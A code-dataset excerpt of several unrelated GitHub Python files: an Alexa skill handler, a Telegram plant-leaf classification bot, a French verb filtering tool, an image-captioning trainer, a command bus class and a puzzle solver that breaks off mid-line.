You'll want to change the following configs:\n\n in deploy-provider: lambda\n function_name\n role\n access_key_id (available from AWS console)\n secret_access_key (also available from AWS console, but make sure you use travis command\n line to encrypt your key)\n\n\n\"\"\"\n\nimport logging\nimport my_py\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\n# --------------- Helpers that build all of the responses ----------------------\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {\n 'outputSpeech': {\n 'type': 'SSML',\n 'ssml': output\n },\n 'card': {\n 'type': 'Simple',\n 'title': title,\n 'content': output\n },\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': should_end_session\n }\n\n\ndef build_response(session_attributes, speechlet_response):\n return {\n 'version': '1.0',\n 'sessionAttributes': session_attributes,\n 'response': speechlet_response\n }\n\n\n# Function which delegates the speech output for the response based on the JSON file.\n# Simply looking up the intent in the responses map created from the parsed JSON.\n#\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n\n logger.info(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n session_attributes = {} # No session attributes needed for simple fact response\n reprompt_text = None # No reprompt text set\n speech_output = \"\"\n should_end_session = True # Can end session after fact is returned (no additional dialogue)\n\n if intent_name == \"launch\":\n should_end_session = False # Opening a skill requires the session remain open\n elif intent_name == \"AMAZON.HelpIntent\":\n should_end_session = False # Asking for help requires the session remain open\n intent_name = 'help'\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n intent_name = 'end'\n else:\n intent_name = intent_name.lower()\n\n # Grab the response specified for the given intent of the JSON by calling\n # the function defined in my_py\n speech_output = getattr(my_py,intent_name)()\n\n return build_response(session_attributes, build_speechlet_response\n (intent_name,speech_output,reprompt_text,should_end_session))\n\n# --------------- Main handler ------------------\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) 
The JSON body of the request is provided in the event parameter.\n \"\"\"\n logger.info(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n # if (event['session']['application']['applicationId'] !=\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n # raise ValueError(\"Invalid Application ID\")\n\n # I am injecting a new \"intent\" type of launch in order to\n # allow my_py to provide the response text for a LaunchRequest\n if event['request']['type'] == \"LaunchRequest\":\n event['request']['intent'] = { 'name':'launch' }\n \n return on_intent(event['request'], event['session'])\n\n","repo_name":"cherie1/cherie_skill","sub_path":"src/alexa_py.py","file_name":"alexa_py.py","file_ext":"py","file_size_in_byte":5080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27745435996","text":"import telebot\r\nimport time\r\nimport os\r\nimport keras\r\nfrom keras.models import load_model\r\nimport cv2\r\nfrom PIL import Image\r\nimport imageio\r\n\r\nimport numpy as np\r\nfrom keras.preprocessing import image\r\nfrom keras.applications.mobilenet import preprocess_input\r\n\r\ntoken = \"-\" #(token removed)\r\nbot = telebot.TeleBot(token)\r\n\r\n\r\nmodel = load_model(\"W://bot/MobileNetV2_model_100ep.h5\")\r\nlabels = ['Abutilon_theophrasti', 'Acalypha_rhomboidea', 'Acer_negundo', 'Acer_rubrum', 'Acer_saccharinum',\r\n 'Acer_saccharum', 'Ageratina_altissima', 'Ailanthus_altissima', 'Alliaria_petiolata', 'Allium_cernuum',\r\n 'Allium_tricoccum', 'Amaranthus_spinosus', 'Ambrosia_artemisiifolia', 'Ambrosia_trifida',\r\n 'Amelanchier_arborea', 'Amphicarpa_bracteata', 'Apocynum_cannabinum', 'Arabis_laevigata', 'Artemisia_annua',\r\n 'Asarum_canadense', 'Asclepias_syriaca', 'Asimina_triloba', 'Asplenium_platyneuron', 'Aster_cordifolius',\r\n 'Aster_divaricatus', 'Boehmeria_cylindrica', 'Campsis_radicans', 'Carpinus_caroliniana', 'Carya_cordiformis',\r\n 'Carya_glabra', 'Catalpa_bignonioides', 'Celastrus_orbiculatus', 'Celtis_occidentalis',\r\n 'Cephalanthus_occidentalis', 'Cercis_canadensis', 'Chasmanthium_latifolium', 'Chionanthus_virginicus',\r\n 'Circaea_lutetiana', 'Collinsonia_canadensis', 'Commelina_communis', 'Conium_maculatum', 'Corydalis_flavula',\r\n 'Crataegus_crus-galli', 'Cunila_origanoides', 'Cynanchum_laeve', 'Datura_stramonium', 'Daucus_carota',\r\n 'Desmodium_glabellum', 'Dicentra_canadensis', 'Dichanthelium_acuminatum_var._fasciculatum',\r\n 'Dichanthelium_boscii', 'Dichanthelium_clandestinum', 'Dioscorea_villosa', 'Diospyros_virginiana',\r\n 'Dipsacus_sylvestris', 'Dirca_palustris', 'Dryopteris_marginalis', 'Duchesnea_indica', 'Erigenia_bulbosa',\r\n 'Erigeron_annuus', 'Erysimum_cheiranthoides', 'Erythronium_americanum', 'Euonymus_americanus',\r\n 'Eupatorium_coelestinum', 'Eupatorium_purpureum', 'Eupatorium_serotinum', 'Euphorbia_maculata',\r\n 'Fraxinus_americana', 'Galium_aparine', 'Geum_canadense', 'Glechoma_hederacea', 'Gleditsia_triacanthos',\r\n 'Hamamelis_virginiana', 'Heliopsis_helianthoides', 'Hesperis_matronalis', 'Hibiscus_laevis',\r\n 'Houstonia_purpurea', 'Humulus_japonicus', 'Hydrophyllum_canadense', 'Hydrophyllum_virginianum',\r\n 'Hypericum_mutilum', 'Hypericum_prolificum', 'Hypericum_punctatum', 'Ilex_opaca', 'Impatiens_capensis',\r\n 'Ipomoea_lacunosa', 
'Ipomoea_pandurata', 'Jeffersonia_diphylla', 'Juglans_nigra', 'Juncus_tenuis',\r\n 'Justicia_americana', 'Lamium_purpureum', 'Laportea_canadensis', 'Lespedeza_procumbens', 'Ligustrum_vulgare',\r\n 'Lindera_benzoin', 'Lindernia_dubia', 'Liriodendron_tulipifera', 'Lonicera_japonica', 'Lonicera_maacki',\r\n 'Lycopus_americanus', 'Lysimachia_nummularia', 'Maclura_pomifera', 'Malus_angustifolia', 'Melilotus_alba',\r\n 'Melilotus_albus', 'Menispermum_canadense', 'Mertensia_virginiana', 'Microstegium_vimineum',\r\n 'Mitchella_repens', 'Mollugo_verticillata', 'Ostrya_virginiana', 'Oxalis_stricta', 'Paronychia_canadensis',\r\n 'Parthenocissus_quinquefolia', 'Passiflora_lutea', 'Penthorum_sedoides', 'Perilla_frutescens',\r\n 'Phacelia_ranunculacea', 'Phlox_divaricata', 'Phytolacca_americana', 'Pilea_pumila', 'Platanus_occidentalis',\r\n 'Podophyllum_peltatum', 'Polygonatum_biflorum', 'Polygonum_cespitosum', 'Polygonum_cuspidatum',\r\n 'Polygonum_lapathifolium', 'Polygonum_perfoliatum', 'Polygonum_punctatum', 'Polygonum_virginianum',\r\n 'Polymnia_uvedalia', 'Polypodium_virginianum', 'Polystichum_acrostichoides', 'Portulaca_oleracea',\r\n 'Potentilla_canadensis', 'Prunus_serotina', 'Ptelea_trifoliata', 'Quercus_alba', 'Quercus_montana',\r\n 'Quercus_rubra', 'Ranunculus_arbortivus', 'Ranunculus_recurvatus', 'Robinia_pseudoacacia', 'Rosa_multiflora',\r\n 'Rubus_flagellaris', 'Rubus_phoenicolasius', 'Rudbeckia_laciniata', 'Rumex_altissimus', 'Sambucus_canadensis',\r\n 'Saponaria_officinalis', 'Saururus_cernuus', 'Saxifraga_virginiensis', 'Scrophularia_marilandica',\r\n 'Sedum_ternatum', 'Senecio_aureus', 'Setaria_faberi', 'Setaria_viridis', 'Sida_spinosa', 'Silene_latifolia',\r\n 'Silene_stellata', 'Smilacina_racemosa', 'Smilax_glauca', 'Smilax_rotundifolia', 'Solanum_carolinense',\r\n 'Solanum_nigrum', 'Solidago_caesia', 'Solidago_flexicaulis', 'Solidago_ulmifolia', 'Staphylea_trifolia',\r\n 'Stellaria_media', 'Stellaria_pubera', 'Symphoricarpos_orbiculatus', 'Tanacetum_vulgare',\r\n 'Teucrium_canadense', 'Tilia_americana', 'Toxicodendron_radicans', 'Tradescantia_virginiana',\r\n 'Trillium_sessile', 'Ulmus_americana', 'Ulmus_rubra', 'Urtica_dioica', 'Uvularia_sessilifolia',\r\n 'Vaccinium_pallidum', 'Vaccinium_stamineum', 'Verbena_hastata', 'Verbena_urticifolia',\r\n 'Verbesina_alternifolia', 'Vernonia_noveboracensis', 'Veronica_hederifolia', 'Viburnum_prunifolium',\r\n 'Viola_sororia', 'Viola_striata', 'Vitis_riparia', 'Xanthium_strumarium', 'Zizia_aurea']\r\n\r\n\r\ndef preprocess(img):\r\n print(\"entered preprocessing\")\r\n h, w, ch = img.shape\r\n sz = max(h, w)\r\n result = [[[255, 255, 255] for _ in range(sz)] for _ in range(sz)]\r\n if sz > h:\r\n for it in range(sz - h):\r\n for j in range(sz):\r\n result[h + it][j] = list(img[-1][j])\r\n else:\r\n for it in range(h):\r\n for j in range(sz - w):\r\n result[it][-j - 1] = list(img[it][-1])\r\n for it in range(h):\r\n for j in range(w):\r\n result[it][j] = list(img[it][j])\r\n print(\"resizing done\")\r\n result = np.array(result, dtype='uint8')\r\n result = cv2.cvtColor(result, cv2.COLOR_BGR2RGB)\r\n result = Image.fromarray(result).resize((224, 224))\r\n fout = \"W:/bot/image2.jpg\"\r\n imageio.imwrite(fout, result)\r\n\r\n\r\ndef classify(img_path):\r\n print(\"entered classify\")\r\n img = image.load_img(img_path, target_size=(224, 224))\r\n img_array = image.img_to_array(img)\r\n img_batch = np.expand_dims(img_array, axis=0)\r\n img_preprocessed = preprocess_input(img_batch)\r\n prediction = model.predict(img_preprocessed)\r\n n = 5\r\n 
y_preds = np.argsort(prediction, axis=1)[:,-n:]\r\n    res = sorted(y_preds[0])\r\n    resp = []\r\n    links = []\r\n    for i in res:\r\n        resp.append(labels[i])\r\n    for i in range(len(resp)):\r\n        links.append(\"google.com/search?q=\")\r\n        for k in range(len(resp[i])):\r\n            if resp[i][k] == \"_\":\r\n                links[i] += \"+\"\r\n            else:\r\n                links[i] += resp[i][k]\r\n    result = \"\"\r\n    for i in range(len(resp)):\r\n        result += \"\" + resp[i] + \"\"\r\n        if i != len(resp) - 1:\r\n            result += \"\\n\"\r\n    return result\r\n\r\n\r\n# Start of the dialogue\r\n@bot.message_handler(commands=['start'])\r\ndef start_message(message):\r\n    handle_help(message)\r\n\r\n\r\n# Main menu\r\n@bot.message_handler(commands=['help']) # Handles the /help command\r\ndef handle_help(message):\r\n    bot.send_message(message.chat.id, \"Greetings, \" + message.from_user.first_name +\r\n                     \"!\\nSend a photo of a plant leaf to this chat.\"\r\n                     \" The reply will list the 5 most likely Latin names for this species.\")\r\n\r\n\r\n\r\n# Download the photo file sent by the user\r\n@bot.message_handler(content_types=[\"photo\"])\r\ndef photo(message):\r\n    print(\"photo received. Processing started.\")\r\n    # print('message.photo =', message.photo)\r\n    fileID = message.photo[-1].file_id\r\n    # print('fileID =', fileID)\r\n    file_info = bot.get_file(fileID)\r\n    # print('file.file_path =', file_info.file_path)\r\n    downloaded_file = bot.download_file(file_info.file_path)\r\n    with open(\"W:/bot/image.jpg\", 'wb') as new_file:\r\n        new_file.write(downloaded_file)\r\n    img = cv2.imread(\"W:/bot/image.jpg\")\r\n    preprocess(img)\r\n    print(\"file preprocessed and saved\")\r\n    response = classify(\"W:/bot/image2.jpg\")\r\n    print(\"classified, response:\\n\", response)\r\n    # bot.reply_to(message, response)\r\n    # bot.reply_to(message, text=response, parse_mode=ParseMode.HTML)\r\n    bot.send_message(message.chat.id, text=response, parse_mode=\"HTML\", disable_web_page_preview=True)\r\n\r\n\r\n@bot.message_handler(content_types=[\"sticker\", \"pinned_message\", \"document\", \"audio\", 'video', 'video_note', 'voice',\r\n                                    'location', 'contact', 'new_chat_members', 'left_chat_member', 'new_chat_title',\r\n                                    'new_chat_photo', 'delete_chat_photo', 'group_chat_created',\r\n                                    'supergroup_chat_created', \"text\",\r\n                                    'channel_chat_created', 'migrate_to_chat_id', 'migrate_from_chat_id',\r\n                                    'pinned_message'])\r\ndef anthg(message):\r\n    handle_help(message)\r\n\r\n\r\ntries = 0\r\nwhile tries < 10:\r\n    try:\r\n        print(\"trying\")\r\n        bot.polling()\r\n    except Exception as E:\r\n        print(E.args)\r\n        print(\"\\ndying...\")\r\n        tries += 1\r\n        time.sleep(1)\r\n","repo_name":"glebrogachyov/Plant_Classifier","sub_path":"PlantClassificationBot.py","file_name":"PlantClassificationBot.py","file_ext":"py","file_size_in_byte":9416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33476384199","text":"import argparse\nimport logging\nfrom pathlib import Path\nfrom typing import Tuple\nfrom tqdm import tqdm\nimport mlconjug3\n\n#################################\n# config\n#################################\n\nverbs_file = \"data/verbs.txt\"\nnouns_file = \"data/nouns.txt\"\nwords_file = \"../data/words.txt\"\noutput_file = \"../data/words_filtered.txt\"\n\n# logging \nlogging.basicConfig(format='%(levelname)s:%(message)s', level=logging.INFO)\n\n#################################\n# main\n#################################\n\nclass VerbConjugator():\n    \"\"\"\n    Conjugates a verb in different moods (default=all)\n    \"\"\"\n\n    
def __init__(self, lang=\"fr\") -> None:\n self.conjugator = mlconjug3.Conjugator(language=lang)\n\n def conjugate_verb(self, verb:str, moods:Tuple[str]=None) -> Tuple[str]:\n\n if not self.conjugator.conjug_manager.is_valid_verb(verb):\n return None\n\n conjugated_list = []\n try:\n conjugated_verb = self.conjugator.conjugate(verb)\n if conjugated_verb == None:\n return None\n\n for conjugate_form in conjugated_verb.iterate():\n conjugated = conjugate_form[-1]\n if conjugated != verb and conjugated not in conjugated_list:\n mood = conjugate_form[0]\n if (moods == None) or (moods != None and (mood in moods)):\n conjugated_list.append(conjugated)\n\n return conjugated_list\n\n except:\n return None\n\ndef main():\n\n # args\n parser = argparse.ArgumentParser(description='list tweets from Twitter API')\n parser.add_argument('-v', '--verbose', action='store_true', help=\"verbose mode\")\n args = parser.parse_args()\n logging.debug(args)\n\n script_dir = Path(__file__).resolve().parent\n\n # load verbs\n print(\"loading verbs\")\n verbs_file = script_dir / Path(verbs_file)\n with open(str(verbs_file), \"r\") as f:\n verbs = [line.rstrip() for line in f]\n\n # load nouns\n print(\"loading nouns\")\n nouns_file = script_dir / Path(nouns_file)\n with open(str(nouns_file), \"r\") as f:\n nouns = [line.rstrip() for line in f]\n\n # conjugate verbs\n print(\"conjugating verbs\")\n conjugator = VerbConjugator(\"fr\")\n moods = ['Indicatif', 'Conditionnel', 'Subjonctif']\n conjugated_verbs = []\n not_conjugated_verbs = []\n for verb in tqdm(verbs):\n conjugated_list = conjugator.conjugate_verb(verb, moods)\n if conjugated_list != None:\n conjugated_verbs += conjugated_list\n else:\n not_conjugated_verbs.append(verb)\n\n if len(not_conjugated_verbs) > 0:\n logging.warning(\"warning : could not conjugate following verbs: {}\".format(\", \".join(not_conjugated_verbs)))\n\n # load words\n print(\"loading words\")\n words_file = script_dir / Path(words_file)\n with open(str(words_file), \"r\") as f:\n words = [line.rstrip() for line in f]\n \n # process words\n print(\"filtering words\")\n words_filtered = []\n words_filtered_file = script_dir / Path(output_file)\n with open(str(words_filtered_file), \"w\") as f:\n for word in tqdm(words):\n if (word not in conjugated_verbs) or (word in nouns):\n f.write(\"{}\\n\".format(word))\n\n print(\"#%s words found\" % len(words))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"arthurcouyere/twitter-bot","sub_path":"tools/word_tools.py","file_name":"word_tools.py","file_ext":"py","file_size_in_byte":3344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33862982891","text":"import datetime\nimport os\nimport pickle\nimport sys\nimport time\nfrom collections import defaultdict\n\nimport sacrebleu\nimport torch.utils.data as data_utils\nfrom IPython.core import ultratb\n\nimport dataset\nfrom faster_rcnn_feats import *\nfrom image_model import ImageCaptioning, ImageMassSeq2Seq\nfrom option_parser import get_img_options_parser\nfrom seq2seq import Seq2Seq\nfrom seq_gen import get_outputs_until_eos\nfrom textprocessor import TextProcessor\nfrom train_image_mt import ImageMTTrainer, get_lex_dict\nfrom utils import build_optimizer, backward\n\nsys.excepthook = ultratb.FormattedTB(mode='Verbose', color_scheme='Linux', call_pdb=False)\n\n\nclass ImageCaptionTrainer(ImageMTTrainer):\n def train_epoch(self, img_data_iter: List[data_utils.DataLoader], step: int, saving_path: str = None,\n 
img_dev_data_iter: List[data_utils.DataLoader] = None, max_step: int = 300000,\n lex_dict=None, accum=1, mt_train_iter: List[data_utils.DataLoader] = None,\n mt_dev_iter: List[data_utils.DataLoader] = None, mtl_weight=0.1, **kwargs):\n \"Standard Training and Logging Function\"\n start = time.time()\n total_tokens, total_loss, tokens, cur_loss = 0, 0, 0, 0\n cur_loss = 0\n batch_zip, shortest = self.get_batch_zip(img_data_iter, None, mt_train_iter)\n\n model = (\n self.model.module if hasattr(self.model, \"module\") else self.model\n )\n for i, batches in enumerate(batch_zip):\n for batch in batches:\n try:\n is_img_batch = isinstance(batch, list) and \"captions\" in batch[0]\n if is_img_batch: # Captioning training data.\n captions = [b[\"captions\"] for b in batch]\n caption_pad_mask = [b[\"caption_mask\"] for b in batch]\n proposals = [b[\"proposal\"] for b in batch] if lex_dict is not None else None\n langs = [b[\"langs\"] for b in batch]\n if len(batch) < self.num_gpu:\n continue\n\n predictions = self.model(tgt_inputs=captions,\n tgt_mask=caption_pad_mask,\n pad_idx=model.text_processor.pad_token_id(),\n tgt_langs=langs, batch=batch, proposals=proposals,\n log_softmax=True)\n targets = torch.cat(list(map(lambda c: c[:, 1:].contiguous().view(-1), captions)))\n tgt_mask_flat = torch.cat(list(map(lambda c: c[:, 1:].contiguous().view(-1), caption_pad_mask)))\n targets = targets[tgt_mask_flat]\n else: # MT data!\n src_inputs = batch[\"src_texts\"].squeeze(0)\n src_mask = batch[\"src_pad_mask\"].squeeze(0)\n tgt_inputs = batch[\"dst_texts\"].squeeze(0)\n tgt_mask = batch[\"dst_pad_mask\"].squeeze(0)\n src_langs = batch[\"src_langs\"].squeeze(0)\n dst_langs = batch[\"dst_langs\"].squeeze(0)\n proposals = batch[\"proposal\"].squeeze(0) if lex_dict is not None else None\n if src_inputs.size(0) < self.num_gpu:\n continue\n predictions = self.model(src_inputs=src_inputs, tgt_inputs=tgt_inputs,\n src_pads=src_mask, tgt_mask=tgt_mask, src_langs=src_langs,\n tgt_langs=dst_langs, proposals=proposals,\n pad_idx=model.text_processor.pad_token_id(), log_softmax=True)\n targets = tgt_inputs[:, 1:].contiguous().view(-1)\n tgt_mask_flat = tgt_mask[:, 1:].contiguous().view(-1)\n targets = targets[tgt_mask_flat]\n ntokens = targets.size(0)\n\n if ntokens > 0:\n if self.num_gpu == 1:\n targets = targets.to(predictions.device)\n\n loss = self.criterion(predictions, targets).mean()\n weight = 1 if is_img_batch else mtl_weight\n backward(loss * weight, self.optimizer, self.fp16)\n\n loss = float(loss.data) * ntokens\n tokens += ntokens\n total_tokens += ntokens\n total_loss += loss\n cur_loss += loss\n\n # We accumulate the gradients for both tasks!\n torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.clip)\n step += 1\n\n if step % accum == 0:\n self.optimizer.step()\n self.optimizer.zero_grad()\n\n if step % 50 == 0 and tokens > 0:\n elapsed = time.time() - start\n print(datetime.datetime.now(),\n \"Epoch Step: %d Loss: %f Tokens per Sec: %f \" % (\n step, cur_loss / tokens, tokens / elapsed))\n\n if step % 500 == 0:\n if img_dev_data_iter is not None and step % 5000 == 0:\n bleu = self.eval_bleu(img_dev_data_iter, saving_path)\n print(\"Captioning BLEU:\", bleu)\n if mt_dev_iter is not None and step % 5000 == 0:\n bleu = super().eval_bleu(mt_dev_iter, saving_path)\n print(\"MT BLEU:\", bleu)\n\n model.save(saving_path + \".latest\")\n with open(os.path.join(saving_path + \".latest\", \"optim\"), \"wb\") as fp:\n pickle.dump(self.optimizer, fp)\n\n start, tokens, cur_loss = time.time(), 0, 0\n\n if 
step >= max_step:\n break\n if i == shortest - 1:\n break\n except RuntimeError as err:\n print(repr(err))\n torch.cuda.empty_cache()\n\n try:\n if img_dev_data_iter is not None:\n bleu = self.eval_bleu(img_dev_data_iter, saving_path)\n print(\"Captioning BLEU:\", bleu)\n if mt_dev_iter is not None:\n bleu = super().eval_bleu(mt_dev_iter, saving_path)\n print(\"MT BLEU:\", bleu)\n\n print(\"Total loss in this epoch: %f\" % (total_loss / total_tokens))\n model.save(saving_path + \".latest\")\n except RuntimeError as err:\n print(repr(err))\n\n return step\n\n def eval_bleu(self, dev_data_iter, saving_path):\n mt_output = []\n mt_ids = []\n model = (\n self.model.module if hasattr(self.model, \"module\") else self.model\n )\n model.eval()\n\n with torch.no_grad():\n for iter in dev_data_iter:\n for batch in iter:\n proposals = [b[\"proposal\"] for b in batch]\n dst_langs = [b[\"langs\"] for b in batch]\n img_ids = [b[\"img_ids\"] for b in batch][0]\n first_tokens = [b[\"first_tokens\"] for b in batch]\n images = [b[\"images\"] for b in batch]\n max_len = [b[\"max_len\"] for b in batch][0]\n outputs = self.generator(images=images, first_tokens=first_tokens, tgt_langs=dst_langs,\n pad_idx=model.text_processor.pad_token_id(), proposals=proposals,\n max_len=max_len)\n if self.num_gpu > 1:\n new_outputs = []\n for output in outputs:\n new_outputs += output\n outputs = new_outputs\n\n mt_output += list(map(lambda x: model.text_processor.tokenizer.decode(x[1:].numpy()), outputs))\n mt_ids += img_ids\n model.train()\n references = list(map(lambda id: self.caption_reference[id], mt_ids))\n max_reflen = max(map(lambda x: len(x), references))\n all_refs = list(map(lambda l: list(map(lambda r: r[l] if l < len(r) else None, references)), range(max_reflen)))\n bleu = sacrebleu.corpus_bleu(mt_output, all_refs, lowercase=True, tokenize=\"intl\")\n\n output = \"\\n\".join([\"\\nOutput:\\n\" + o + \"\\n\\nReferences:\\n\" + \"\\n\".join(\n self.caption_reference[mt_ids[i]]) + \"\\n\\n***************\\n\" for i, o in enumerate(mt_output)])\n with open(os.path.join(saving_path, \"bleu.caption.output\"), \"w\") as writer:\n writer.write(output)\n\n if bleu.score > self.best_bleu:\n self.best_bleu = bleu.score\n print(\"Saving best BLEU\", self.best_bleu)\n model.save(saving_path)\n with open(os.path.join(saving_path, \"optim\"), \"wb\") as fp:\n pickle.dump(self.optimizer, fp)\n\n with open(os.path.join(saving_path, \"bleu.caption.best.output\"), \"w\") as writer:\n writer.write(output)\n\n return bleu.score\n\n @staticmethod\n def train(options):\n lex_dict = None\n if options.dict_path is not None:\n lex_dict = get_lex_dict(options.dict_path)\n if not os.path.exists(options.model_path):\n os.makedirs(options.model_path)\n\n text_processor = TextProcessor(options.tokenizer_path)\n assert text_processor.pad_token_id() == 0\n\n if options.pretrained_path is not None:\n caption_model = Seq2Seq.load(ImageCaptioning, options.pretrained_path, tok_dir=options.tokenizer_path)\n else:\n caption_model = ImageCaptioning(use_proposals=lex_dict is not None, tie_embed=options.tie_embed,\n text_processor=text_processor, resnet_depth=options.resnet_depth,\n lang_dec=options.lang_decoder, enc_layer=options.encoder_layer,\n dec_layer=options.decoder_layer, embed_dim=options.embed_dim,\n intermediate_dim=options.intermediate_layer_dim, use_obj=not options.no_obj)\n\n if options.lm_path is not None: # In our case, this is an MT model.\n mt_pret_model = Seq2Seq.load(ImageMassSeq2Seq, options.lm_path, 
tok_dir=options.tokenizer_path)\n assert len(caption_model.encoder.encoder.layer) == len(mt_pret_model.encoder.encoder.layer)\n assert len(caption_model.decoder.decoder.layer) == len(mt_pret_model.decoder.decoder.layer)\n caption_model.encoder = mt_pret_model.encoder\n caption_model.decoder = mt_pret_model.decoder\n caption_model.output_layer = mt_pret_model.output_layer\n\n print(\"Model initialization done!\")\n\n # We assume that the collator function returns a list with the size of number of gpus (in case of cpus,\n collator = dataset.ImageTextCollator()\n num_batches = max(1, torch.cuda.device_count())\n\n if options.continue_train:\n with open(os.path.join(options.pretrained_path, \"optim\"), \"rb\") as fp:\n optimizer = pickle.load(fp)\n else:\n optimizer = build_optimizer(caption_model, options.learning_rate, warump_steps=options.warmup)\n trainer = ImageCaptionTrainer(model=caption_model, mask_prob=options.mask_prob, optimizer=optimizer,\n clip=options.clip,\n beam_width=options.beam_width, max_len_a=options.max_len_a,\n max_len_b=options.max_len_b, len_penalty_ratio=options.len_penalty_ratio,\n fp16=options.fp16, mm_mode=options.mm_mode)\n\n pin_memory = torch.cuda.is_available()\n img_train_loader = ImageMTTrainer.get_img_loader(collator, dataset.ImageCaptionDataset, options.train_path,\n caption_model, num_batches, options, pin_memory,\n lex_dict=lex_dict, shuffle=(options.local_rank < 0))\n num_processors = max(torch.cuda.device_count(), 1) if options.local_rank < 0 else 1\n mt_train_loader = None\n if options.mt_train_path is not None:\n mt_train_loader = ImageMTTrainer.get_mt_train_data(caption_model, num_processors, options, pin_memory,\n lex_dict=lex_dict)\n\n img_dev_loader = ImageMTTrainer.get_img_loader(collator, dataset.ImageCaptionTestDataset, options.dev_path,\n caption_model, num_batches, options, pin_memory,\n lex_dict=lex_dict,\n shuffle=False, denom=2)\n\n trainer.caption_reference = None\n if img_dev_loader is not None:\n trainer.caption_reference = defaultdict(list)\n generator = (\n trainer.generator.module if hasattr(trainer.generator, \"module\") else trainer.generator\n )\n for data in img_dev_loader:\n for batch in data:\n for b in batch:\n captions = b[\"captions\"]\n for id in captions:\n for caption in captions[id]:\n refs = get_outputs_until_eos(text_processor.sep_token_id(), caption,\n remove_first_token=True)\n ref = [generator.seq2seq_model.text_processor.tokenizer.decode(ref.numpy()) for ref in\n refs]\n trainer.caption_reference[id] += ref\n print(\"Number of dev image/captions\", len(trainer.caption_reference))\n\n mt_dev_loader = None\n if options.mt_dev_path is not None:\n mt_dev_loader = ImageMTTrainer.get_mt_dev_data(caption_model, options, pin_memory, text_processor, trainer,\n lex_dict=lex_dict)\n print(\"Number of dev sentences\", len(trainer.reference))\n\n step, train_epoch = 0, 1\n while options.step > 0 and step < options.step:\n print(\"train epoch\", train_epoch)\n step = trainer.train_epoch(img_data_iter=img_train_loader, img_dev_data_iter=img_dev_loader,\n max_step=options.step, lex_dict=lex_dict, mt_train_iter=mt_train_loader,\n saving_path=options.model_path, step=step, accum=options.accum,\n mt_dev_iter=mt_dev_loader, mtl_weight=options.mtl_weight)\n train_epoch += 1\n\n\nif __name__ == \"__main__\":\n parser = get_img_options_parser()\n (options, args) = parser.parse_args()\n print(options)\n ImageCaptionTrainer.train(options=options)\n print(\"Finished 
Training!\")\n","repo_name":"rasoolims/ImageTranslate","sub_path":"src/train_captioning.py","file_name":"train_captioning.py","file_ext":"py","file_size_in_byte":15519,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"24402686020","text":"from typing import Any, TypeVar\n\nfrom .exception import CommandHandlerDoesNotExistException\n\nReturnType = TypeVar('ReturnType')\n\nclass CommandBus:\n\n def execute(self, cmd, providers: dict[Any, Any] = {}):\n Handler = cmd.__handler__\n\n if Handler is None:\n raise CommandHandlerDoesNotExistException()\n\n result = Handler(**providers).execute(cmd)\n return result","repo_name":"cafadev/turbobus","sub_path":"turbobus/bus.py","file_name":"bus.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"71460445928","text":"class Tower(object):\n def __init__(self):\n self.weight = 0\n self.parent = None\n self.children = []\n \n def __str__(self):\n return \"%d, %s, %s\" % (self.weight, self.parent, self.children)\n \ndef SumOfWeights(towers, name):\n sum = towers[name].weight\n for childName in towers[name].children:\n sum += SumOfWeights(towers, childName)\n \n return sum\n \n \ndef FindWrong(towers):\n wrongTower = None\n wrongWeight = 10**9\n for tower in towers:\n if (len(towers[tower].children) > 0):\n weight = SumOfWeights(towers, towers[tower].children[0])\n for childName in towers[tower].children:\n if (weight != SumOfWeights(towers, childName)):\n if (wrongWeight > weight):\n wrongTower = tower\n wrongWeight = weight\n \n return wrongTower\n\n\ndef main():\n with open(\"input\", \"r\") as file:\n input = file.readlines()\n \n towers = {}\n \n for line in input:\n line = line.strip().split(\" \")\n name = line[0]\n weight = int(line[1][1:-1])\n if (name not in towers):\n towers[name] = Tower()\n \n towers[name].weight = weight\n \n if (len(line) > 2):\n for i in range(3, len(line)):\n childName = line[i] if line[i][-1] != \",\" else line[i][:-1]\n if (childName not in towers):\n towers[childName] = Tower()\n \n towers[childName].parent = name\n towers[name].children.append(childName)\n \n # Part1. 
Top most tower\n for name, tower in towers.items():\n if (tower.parent == None):\n print(\"No parent: %s\" % (name))\n break\n \n # for tower in towers:\n # print(\"%s, %s, %d\" % (tower, towers[tower], SumOfWeights(towers, tower)))\n \n # Find wrong tower\n wrong = FindWrong(towers)\n print(wrong)\n\n # for childName in towers[wrong].children:\n # print(\"Sum: %d, Weight: %d, Name: %s\" % (SumOfWeights(towers, childName), towers[childName].weight, childName))\n \n # Find most common weight.\n weightDict = {}\n for childName in towers[wrong].children:\n sumWeight = SumOfWeights(towers, childName)\n if (sumWeight not in weightDict):\n weightDict[sumWeight] = 1\n else:\n weightDict[sumWeight] += 1\n \n # Sort weights and calculate wanted difference.\n sortedWeights = ([key for key in sorted(weightDict, key=weightDict.get, reverse=True)])\n weightDiff = sortedWeights[0] - sortedWeights[1]\n \n # Find which tower has wrong weight and subtract.\n for childName in towers[wrong].children:\n if (SumOfWeights(towers, childName) == sortedWeights[1]):\n print(towers[childName].weight + 